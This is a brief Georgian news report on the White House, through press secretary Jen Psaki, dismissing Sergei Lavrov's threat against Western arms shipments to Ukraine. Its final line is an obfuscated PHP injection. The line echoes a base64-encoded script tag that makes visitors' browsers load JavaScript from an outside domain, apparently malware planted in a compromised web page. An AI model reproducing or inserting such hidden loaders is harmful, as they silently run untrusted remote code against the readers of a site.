celsiusi
ავერსი საქკაბელი
თეთრი სახლი დიდ მნიშვნელობას არ ანიჭებს რუსეთის საგარეო საქმეთა მინისტრის სერგეი ლავროვის მუქარას უკრაინაში მიმავალი მატერიალური დახმარების მიმართ. ამის შესახებ ინფორმაციას  CNN-ი ავრცელებს.
 
თეთრი სახლის პრესსპიკერმა ჯენ ფსაკიმ რუსეთის საგარეო საქმეთა მინისტრის სერგეი ლავროვის განცხადებასთან დაკავშირებით, განაცხადა, რომ მსგავსი მუქარა ადრეც ყოფილა.
 
„ეს არის მუქარა, რომელიც მან ადრეც გააკეთა. ამერიკის ჯარები არ მოქმედებენ უკრაინის შიგნით. აშშ ყურადღებით აკვირდება რუსეთის ესკალაციურ მოქმედებებს " - განაცხადა თეთრი სახლის პრესმდივანმა პრესკონფერენციაზე.
 
შეგახსენებთ, რუსეთის საგარეო საქმეთა მინისტრი სერგეი ლავროვი აცხადებს, რომ რუსი სამხედროები უკრაინისთვის იარაღის ნებისმიერ გადაზიდვას სამიზნედ აღიქვამენ და მოსკოვი კიევისთვის S-300 საზენიტო-სარაკეტო სისტემების სხვა ქვეყნიდან მიწოდებას არ დაუშვებს.
 
812
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");